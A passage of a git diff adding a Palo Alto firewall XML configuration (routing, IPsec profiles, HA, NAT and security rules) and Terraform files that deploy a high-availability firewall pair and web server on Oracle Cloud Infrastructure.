+          </role-based>
+        </permissions>
+      </entry>
+    </users>
+    <password-complexity>
+      <enabled>yes</enabled>
+      <minimum-length>8</minimum-length>
+    </password-complexity>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <ip>
+                  <entry name="192.168.1.100/24"/>
+                </ip>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <ip>
+                  <entry name="192.168.2.100/24"/>
+                </ip>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/3">
+              <ha/>
+            </entry>
+          </ethernet>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway/>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class-bandwidth-type>
+                <mbps>
+                  <class>
+                    <entry name="class1">
+                      <priority>real-time</priority>
+                    </entry>
+                    <entry name="class2">
+                      <priority>high</priority>
+                    </entry>
+                    <entry name="class3">
+                      <priority>high</priority>
+                    </entry>
+                    <entry name="class4">
+                      <priority>medium</priority>
+                    </entry>
+                    <entry name="class5">
+                      <priority>medium</priority>
+                    </entry>
+                    <entry name="class6">
+                      <priority>low</priority>
+                    </entry>
+                    <entry name="class7">
+                      <priority>low</priority>
+                    </entry>
+                    <entry name="class8">
+                      <priority>low</priority>
+                    </entry>
+                  </class>
+                </mbps>
+              </class-bandwidth-type>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>192.168.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="webservers">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>192.168.101.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+          <global-protect-gateway/>
+          <global-protect-site-to-site/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <static/>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FWB</hostname>
+          <ip-address>192.168.0.12</ip-address>
+          <netmask>255.255.255.0</netmask>
+          <default-gateway>192.168.0.1</default-gateway>
+          <dns-setting>
+            <servers>
+              <primary>169.254.169.254</primary>
+              <secondary>8.8.8.8</secondary>
+            </servers>
+          </dns-setting>
+          <ntp-servers>
+            <primary-ntp-server>
+              <ntp-server-address>us.pool.ntp.org</ntp-server-address>
+              <authentication-type>
+                <none/>
+              </authentication-type>
+            </primary-ntp-server>
+            <secondary-ntp-server>
+              <ntp-server-address>pool.ntp.org</ntp-server-address>
+              <authentication-type>
+                <none/>
+              </authentication-type>
+            </secondary-ntp-server>
+          </ntp-servers>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+            </initcfg>
+          </management>
+          <auto-mac-detect>yes</auto-mac-detect>
+        </setting>
+        <high-availability>
+          <interface>
+            <ha1>
+              <port>management</port>
+            </ha1>
+            <ha1-backup/>
+            <ha2>
+              <port>ethernet1/3</port>
+              <ip-address>192.168.30.102</ip-address>
+              <netmask>255.255.255.0</netmask>
+              <gateway>192.168.30.1</gateway>
+            </ha2>
+          </interface>
+          <group>
+            <group-id>1</group-id>
+            <peer-ip>192.168.0.11</peer-ip>
+            <state-synchronization>
+              <transport>ip</transport>
+            </state-synchronization>
+            <election-option>
+              <device-priority>102</device-priority>
+              <timers>
+                <recommended/>
+              </timers>
+            </election-option>
+            <mode>
+              <active-passive>
+                <passive-link-state>auto</passive-link-state>
+              </active-passive>
+            </mode>
+          </group>
+          <enabled>yes</enabled>
+        </high-availability>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <nat>
+              <rules>
+                <entry name="Inbound to web1" uuid="f113f416-bc15-4679-b8c8-b7fe7d3e5adb">
+                  <dynamic-destination-translation>
+                    <translated-address>web1</translated-address>
+                  </dynamic-destination-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <to-interface>any</to-interface>
+                </entry>
+                <entry name="Outbound to Internet" uuid="30c30932-c075-4093-9cb5-a8a4e9decfd3">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <translated-address>
+                        <member>fw-untrust</member>
+                      </translated-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+            <security>
+              <rules>
+                <entry name="Inbound to web1" uuid="92a029fa-0138-4961-a331-fe3d16d6e70b">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="Outbound to Internet" uuid="6fa9b8d8-e523-4907-afce-88f6230a1596">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+              </rules>
+            </security>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default" uuid="5115e93d-d7d3-4030-9ee6-ddd15a71854a">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default" uuid="7d39b7cd-32d0-478a-8b7b-b533fb635aeb">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <address>
+            <entry name="web1">
+              <ip-netmask>192.168.101.2</ip-netmask>
+            </entry>
+            <entry name="fw-untrust">
+              <ip-netmask>192.168.1.100</ip-netmask>
+            </entry>
+          </address>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/oci/HA/identity_policy.tf b/oci/HA/identity_policy.tf
new file mode 100644
index 00000000..c2d601b7
--- /dev/null
+++ b/oci/HA/identity_policy.tf
@@ -0,0 +1,14 @@
+resource "oci_identity_dynamic_group" "ha" {
+  compartment_id = "${var.tenancy_ocid}"
+  name           = "HA"
+  description    = "dynamic group created by terraform"
+  matching_rule  = "any {ANY {instance.id = '${oci_core_instance.firewall1.id}',instance.id = '${oci_core_instance.firewall2.id}'}}"
+}
+resource "oci_identity_policy" "ha" {
+  name           = "HA"
+  description    = "dynamic policy created by terraform"
+  compartment_id = "${oci_identity_compartment.compartment.id}"
+  statements = ["Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use virtual-network-family in compartment ${oci_identity_compartment.compartment.name}",
+    "Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use instance-family in compartment ${oci_identity_compartment.compartment.name}",
+  ]
+}
\ No newline at end of file
diff --git a/oci/HA/internet_gateway.tf b/oci/HA/internet_gateway.tf
new file mode 100644
index 00000000..27439e7d
--- /dev/null
+++ b/oci/HA/internet_gateway.tf
@@ -0,0 +1,6 @@
+resource "oci_core_internet_gateway" "internet_gateway" {
+  compartment_id = "${oci_identity_compartment.compartment.id}"
+  vcn_id = "${oci_core_vcn.vcn.id}"
+  display_name = "IG-PANW"
+  enabled = true
+}
\ No newline at end of file
diff --git a/oci/HA/providers.tf b/oci/HA/providers.tf
new file mode 100644
index 00000000..27515797
--- /dev/null
+++ b/oci/HA/providers.tf
@@ -0,0 +1,11 @@
+#terraform {
+#  required_version = ">= 0.12"
+#}
+
+provider "oci" {
+  tenancy_ocid     = "${var.tenancy_ocid}"
+  user_ocid        = "${var.user_ocid}"
+  fingerprint      = "${var.fingerprint}"
+  private_key_path = "${var.private_key_path}"
+  region           = "${var.region}"
+}
\ No newline at end of file
diff --git a/oci/HA/route_tables.tf b/oci/HA/route_tables.tf
new file mode 100644
index 00000000..2e086160
--- /dev/null
+++ b/oci/HA/route_tables.tf
@@ -0,0 +1,24 @@
+resource "oci_core_route_table" "public" {
+  compartment_id = "${oci_identity_compartment.compartment.id}"
+  vcn_id         = "${oci_core_vcn.vcn.id}"
+  display_name   = "RT-Public"
+
+  route_rules {
+    description       = "default"
+    destination       = "0.0.0.0/0"
+    destination_type  = "CIDR_BLOCK"
+    network_entity_id = "${oci_core_internet_gateway.internet_gateway.id}"
+  }
+}
+resource "oci_core_route_table" "web" {
+  compartment_id = "${oci_identity_compartment.compartment.id}"
+  vcn_id         = "${oci_core_vcn.vcn.id}"
+  display_name   = "RT-Web"
+
+  route_rules {
+    description       = "default"
+    destination       = "0.0.0.0/0"
+    destination_type  = "CIDR_BLOCK"
+    network_entity_id = "${oci_core_private_ip.firewall_trust_secondary_private.id}"
+  }
+}
\ No newline at end of file
diff --git a/oci/HA/secondary_ips.tf b/oci/HA/secondary_ips.tf
new file mode 100644
index 00000000..289254e3
--- /dev/null
+++ b/oci/HA/secondary_ips.tf
@@ -0,0 +1,17 @@
+// The secondary IP addresses are initially attached to firewall1 but will float between the firewalls in the event of a failover.
+resource "oci_core_private_ip" "firewall_untrust_secondary_private" {
+    vnic_id = "${oci_core_vnic_attachment.firewall1_untrust.vnic_id}"
+    display_name = "firewall_untrust_secondary_private"
+    ip_address = "${var.untrust_floating_ip}"
+}
+resource "oci_core_private_ip" "firewall_trust_secondary_private" {
+    vnic_id = "${oci_core_vnic_attachment.firewall1_trust.vnic_id}"
+    display_name = "firewall_trust_secondary_private"
+    ip_address = "${var.trust_floating_ip}"
+}
+resource "oci_core_public_ip" "firewall_untrust_secondary_public" {
+    compartment_id  = "${oci_identity_compartment.compartment.id}"
+    lifetime        = "RESERVED"
+    display_name    = "firewall_untrust_secondary_public"
+    private_ip_id   = "${oci_core_private_ip.firewall_untrust_secondary_private.id}"
+}
\ No newline at end of file
diff --git a/oci/HA/security_lists.tf b/oci/HA/security_lists.tf
new file mode 100644
index 00000000..bfa97d25
--- /dev/null
+++ b/oci/HA/security_lists.tf
@@ -0,0 +1,78 @@
+resource "oci_core_security_list" "management" {
+  compartment_id = "${oci_identity_compartment.compartment.id}"
+  vcn_id         = "${oci_core_vcn.vcn.id}"
+  display_name   = "SL-mgmt"
+  egress_security_rules {
+    protocol    = "all"
+    destination = "0.0.0.0/0"
+    stateless = false
+  }
+  ingress_security_rules {
+    protocol  = "6"
+    source    = "${var.fw_mgmt_src_ip}"
+    stateless = false
+    tcp_options {
+      min = 22
+      max = 22
+    }
+  }
+  ingress_security_rules {
+    protocol  = "6"
+    source    = "${var.fw_mgmt_src_ip}"
+    stateless = false
+    tcp_options {
+      min = 443
+      max = 443
+    }
+  }
+  ingress_security_rules {
+    protocol  = "all"
+    source    = "${var.management_cidr}"
+    stateless = false
+  }
+}
+resource "oci_core_security_list" "untrust" {
+  compartment_id = "${oci_identity_compartment.compartment.id}"
+  vcn_id         = "${oci_core_vcn.vcn.id}"
+  display_name   = "SL-untrust"
+  egress_security_rules {
+    protocol    = "all"
+    destination = "0.0.0.0/0"
+    stateless = false
+  }
+  ingress_security_rules {
+    protocol  = "all"
+    source    = "0.0.0.0/0"
+    stateless = false
+  }
+}
+resource "oci_core_security_list" "trust" {
+  compartment_id = "${oci_identity_compartment.compartment.id}"
+  vcn_id         = "${oci_core_vcn.vcn.id}"
+  display_name   = "SL-trust"
+  egress_security_rules {
+    protocol    = "all"
+    destination = "0.0.0.0/0"
+    stateless = false
+  }
+  ingress_security_rules {
+    protocol  = "all"
+    source    = "0.0.0.0/0"
+    stateless = false
+  }
+}
+resource "oci_core_security_list" "web" {
+  compartment_id = "${oci_identity_compartment.compartment.id}"
+  vcn_id         = "${oci_core_vcn.vcn.id}"
+  display_name   = "SL-web"
+  egress_security_rules {
+    protocol    = "all"
+    destination = "0.0.0.0/0"
+    stateless = false
+  }
+  ingress_security_rules {
+    protocol  = "all"
+    source    = "0.0.0.0/0"
+    stateless = false
+  }
+}
\ No newline at end of file
diff --git a/oci/HA/server.tf b/oci/HA/server.tf
new file mode 100644
index 00000000..9a64b4eb
--- /dev/null
+++ b/oci/HA/server.tf
@@ -0,0 +1,26 @@
+resource "oci_core_instance" "web1" {
+  availability_domain = "${var.server_availability_domain}"
+  compartment_id      = "${oci_identity_compartment.compartment.id}"
+  display_name        = "web1"
+  shape               = "${var.server_shape_size}"
+
+  create_vnic_details {
+    subnet_id        = "${oci_core_subnet.web.id}"
+    display_name     = "web1"
+    private_ip        = "${var.web1_ip}"
+    assign_public_ip = false
+  }
+
+  source_details {
+    source_type = "image"
+    source_id   = "${var.ubuntu_image_ocid[var.region]}"
+    boot_volume_size_in_gbs = "60"
+  }
+  metadata = {
+    ssh_authorized_keys = "${var.ssh_authorized_key}"
+    #user_data           = "${base64encode(file("./userdata/bootstrap"))}"
+  }
+  timeouts {
+    create = "60m"
+  }
+}
\ No newline at end of file
diff --git a/oci/HA/terraform.tfvars b/oci/HA/terraform.tfvars
new file mode 100644
index 00000000..61c5ee9f
--- /dev/null
+++ b/oci/HA/terraform.tfvars
@@ -0,0 +1,32 @@
+tenancy_ocid = "<OCID of the tenancy"
+user_ocid = "<OCID of the deploying user>"
+fingerprint = "<fingerpring of the API key>"
+private_key_path = "/root/.oci/oci_api_key.pem"
+parent_compartment_ocid = "<OCID of the parent or root compartment>"
+ssh_authorized_key = "<ssh public key>"
+fw_mgmt_src_ip = "<IP address or subnet authorized to connect to the FW>"
+region = "us-ashburn-1"
+fw1_availability_domain = "PFNB:US-ASHBURN-AD-1"
+fw2_availability_domain = "PFNB:US-ASHBURN-AD-2"
+server_availability_domain = "PFNB:US-ASHBURN-AD-1"
+compartment_name = "PANW-compartment"
+vcn_cidr = "192.168.0.0/16"
+management_cidr = "192.168.0.0/24"
+fw1_management_ip = "192.168.0.11"
+fw2_management_ip = "192.168.0.12"
+untrust_cidr = "192.168.1.0/24"
+fw1_untrust_ip = "192.168.1.101"
+fw2_untrust_ip = "192.168.1.102"
+untrust_floating_ip = "192.168.1.100"
+trust_cidr = "192.168.2.0/24"
+fw1_trust_ip = "192.168.2.101"
+fw2_trust_ip = "192.168.2.102"
+trust_floating_ip = "192.168.2.100"
+ha2_cidr = "192.168.30.0/24"
+fw1_ha2_ip = "192.168.30.101"
+fw2_ha2_ip = "192.168.30.102"
+web_cidr = "192.168.101.0/24"
+web1_ip = "192.168.101.2"
+fw_ocid = "ocid1.image.oc1..aaaaaaaapq6xrfl3j2qs5vjgeni7c7hyq6myg7uaqzdzxsk373qrxbzyv7aa"
+fw_shape_size = "VM.Standard2.4"
+server_shape_size = "VM.Standard2.1"
diff --git a/oci/HA/variables.tf b/oci/HA/variables.tf
new file mode 100644
index 00000000..36afaaca
--- /dev/null
+++ b/oci/HA/variables.tf
@@ -0,0 +1,120 @@
+variable "tenancy_ocid" {
+  description = "OCID of the tenant"
+}
+variable "user_ocid" {
+  description = "OCID of the user creating the infrastructure"
+}
+variable "fingerprint" {
+  description = "fingerprint of the API key used for authentication"
+}
+variable "private_key_path" {
+  description = "path to the private key used for authentication"
+}
+variable "region" {
+  description = "region where the compartment is located"
+}
+variable "parent_compartment_ocid" {
+  description = "OCID of the parent compartment"
+}
+variable "compartment_name" {
+  description = "name of the compartment to create"
+}
+variable "vcn_cidr" {
+  description = "cidr block to use for the vcn"
+}
+variable "fw_mgmt_src_ip" {
+  description = "source IP or CIDR allowed to manage the FW"
+}
+variable "fw_ocid" {
+  description = "OCID of the FW image to deploy"
+}
+variable "fw_shape_size" {
+  description = "shape size for the FW (VM.Standard2.4 minimum)"
+}
+variable "fw1_availability_domain" {
+  description = "availability domain into which FW1 will be deployed"
+}
+variable "fw2_availability_domain" {
+  description = "availability domain into which FW2 will be deployed"
+}
+variable "ssh_authorized_key" {
+  description = "public SSH key to install on the hosts"
+}
+variable "management_cidr" {
+  description = "CIDR block for the management subnet"
+}
+variable "fw1_management_ip" {
+  description = "IP address for the fw1 management interface"
+}
+variable "fw2_management_ip" {
+  description = "IP address for the fw2 management interface"
+}
+variable "untrust_cidr" {
+  description = "CIDR block for the untrust subnet"
+}
+variable "fw1_untrust_ip" {
+  description = "IP address for the fw1 untrust interface"
+}
+variable "fw2_untrust_ip" {
+  description = "IP address for the fw2 untrust interface"
+}
+variable "untrust_floating_ip" {
+  description = "floating IP address for the untrust interface"
+}
+variable "trust_cidr" {
+  description = "CIDR block for the trust subnet"
+}
+variable "fw1_trust_ip" {
+  description = "IP address for the fw1 trust interface"
+}
+variable "fw2_trust_ip" {
+  description = "IP address for the fw2 trust interface"
+}
+variable "trust_floating_ip" {
+  description = "floating IP address for the trust interface"
+}
+variable "ha2_cidr" {
+  description = "CIDR block for the ha2 subnet"
+}
+variable "fw1_ha2_ip" {
+  description = "IP address for the fw1 ha2 interface"
+}
+variable "fw2_ha2_ip" {
+  description = "IP address for the fw2 ha2 interface"
+}
+variable "web_cidr" {
+  description = "CIDR block for the web subnet"
+}
+variable "web1_ip" {
+  description = "ip adress for web1"
+}
+variable "server_shape_size" {
+  description = "shape size for the server"
+}
+variable "ubuntu_image_ocid" {
+  type = "map"
+  default = {
+    ap-melbourne-1 = "ocid1.image.oc1.ap-melbourne-1.aaaaaaaajdcf2heyxkmgvdtbbczu74cl6qbc5gxew56c3y3q6dbjsul6b6aq"
+    ap-mumbai-1 = "ocid1.image.oc1.ap-mumbai-1.aaaaaaaayjxakga6uhq3dcprkziczfnoug5rpwjqfot6s6lteuylbcjv4bya"
+    ap-osaka-1 = "ocid1.image.oc1.ap-osaka-1.aaaaaaaapc4kllvk4vib7fhnug7ukm2txuhitdrfhyt7sickogqt7iswvfqq"
+    ap-seoul-1 = "ocid1.image.oc1.ap-seoul-1.aaaaaaaazrfma7gwjj36m7vcxeork2azxshoymo4zbi5jfti6zqvcmopix7a"
+    ap-sydney-1 = "ocid1.image.oc1.ap-sydney-1.aaaaaaaauskrlywocekwttksypjq5imxevgpfayhfgobemmdio2e42nj5hrq"
+    ap-tokyo-1 = "ocid1.image.oc1.ap-tokyo-1.aaaaaaaa3rhjibflbzqbloypnpxegzyxxni2wyllbbilhzowvcja3iz7h4sq"
+    ca-montreal-1 = "ocid1.image.oc1.ca-montreal-1.aaaaaaaainz6oiqrgokqfvxpbfwciswg3hjsbno4dlmxkwtl6v6e6tjrsz5a"
+    ca-toronto-1 = "ocid1.image.oc1.ca-toronto-1.aaaaaaaatkqz6qc7iojynkffjs75jrvqnxnvycdusat4v3iiea25zb2kftta"
+    eu-amsterdam-1 = "ocid1.image.oc1.eu-amsterdam-1.aaaaaaaabp7qk76ijyrminiue2m3biqjfz4dzpfdrdtg5cv2me2gyuptanpq"
+    eu-frankfurt-1 = "ocid1.image.oc1.eu-frankfurt-1.aaaaaaaaztrgnqdk6lctht72zn4wjpy6fpaacarblsrl74dq2vnzgipctgeq"
+    eu-zurich-1 = "ocid1.image.oc1.eu-zurich-1.aaaaaaaaoj3jvr57jyg5ugeb2oyxr3vdrqt47mls66j3nhb7xjtmlokcdchq"
+    me-jeddah-1 = "ocid1.image.oc1.me-jeddah-1.aaaaaaaaa7crfvj23zizibv4n2dne4uc3ksw35judghweftep4mdtlcdmdwa"
+    sa-saopaulo-1 = "ocid1.image.oc1.sa-saopaulo-1.aaaaaaaabraq4wsw67oivaicttnmw6oegizim3pb5abxzoj63uzfxxhahuqa"
+    uk-gov-london-1 = "ocid1.image.oc4.uk-gov-london-1.aaaaaaaafxczrxrlkccsbyaa2ertdehkpqttx73zwzeq75bowbklsp2pqi2a"
+    uk-london-1 = "ocid1.image.oc1.uk-london-1.aaaaaaaa276jkgmoibf3teixw7olzx4oa64bakbj5qaewwxtfwwpenxcf3jq"
+    us-ashburn-1 = "ocid1.image.oc1.iad.aaaaaaaa6x4mvi4tkiigibgtovqbinjnmr4qibuygpkifitgd5b7knjni7fq"
+    us-langley-1 = "ocid1.image.oc2.us-langley-1.aaaaaaaa65aorjlfq342p2rcjl5afekasasjsrvimqcb7jrjbu5yyyabdvbq"
+    us-luke-1 = "ocid1.image.oc2.us-luke-1.aaaaaaaaqgziggzzcow75qwnsovoooxioawzuczpmewiom2ljpf4ywey4dsq"
+    us-phoenix-1 = "ocid1.image.oc1.phx.aaaaaaaagmkn4gdhvvx24kiahh2b2qchsictjjnujfw7vtytftmvnteyfckq"
+  }
+}
+variable "server_availability_domain" {
+  description = "AD size for the server"
+}
\ No newline at end of file
diff --git a/oci/HA/vcn_subnets.tf b/oci/HA/vcn_subnets.tf
new file mode 100644
index 00000000..6b67c410
--- /dev/null
+++ b/oci/HA/vcn_subnets.tf
@@ -0,0 +1,46 @@
+resource "oci_core_vcn" "vcn" {
+  cidr_block      = "${var.vcn_cidr}"
+  compartment_id  = "${oci_identity_compartment.compartment.id}"
+  display_name    = "VCN-PANW"
+}
+resource "oci_core_subnet" "management" {
+  cidr_block          = "${var.management_cidr}"
+  display_name        = "mgmt"
